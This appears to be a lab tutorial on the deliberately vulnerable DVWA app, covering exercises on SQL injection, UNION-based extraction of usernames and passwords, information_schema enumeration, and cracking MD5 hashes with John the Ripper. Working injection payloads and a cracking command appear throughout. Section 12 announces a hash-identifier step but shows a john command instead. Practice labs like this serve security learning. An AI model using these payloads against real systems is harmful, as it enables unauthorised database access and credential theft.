DVWA Exercises 5

09 SQL Injection

Here we can see an input field where we can put in a number. The sql statement in the background could look like this:

select firstname,surname from users where uid='$_GET['id']';

Let's try to inject a SQL statement:

1' or '1' = '1

10 SQL Injection with union

With SQL Union we can grab information from other tables.

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

This SQL query will return a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.

For a UNION query to work, two key requirements must be met:

• The individual queries must return the same number of columns.

• The data types in each column must be compatible between the individual queries.

Let's try the following SQL Query:

%' or '0'='0' union select user,password from users #

11 Further Database Enumeration

Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables

You can then query information_schema.columns to list the columns in individual tables:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Let's try the following SQL Query:

%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #

12 Crack the password hashes

I put the collected password hashes in a file and try to crack the passwords with John the ripper.

First let's check which hash type we have with a tool called hash-identifier:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt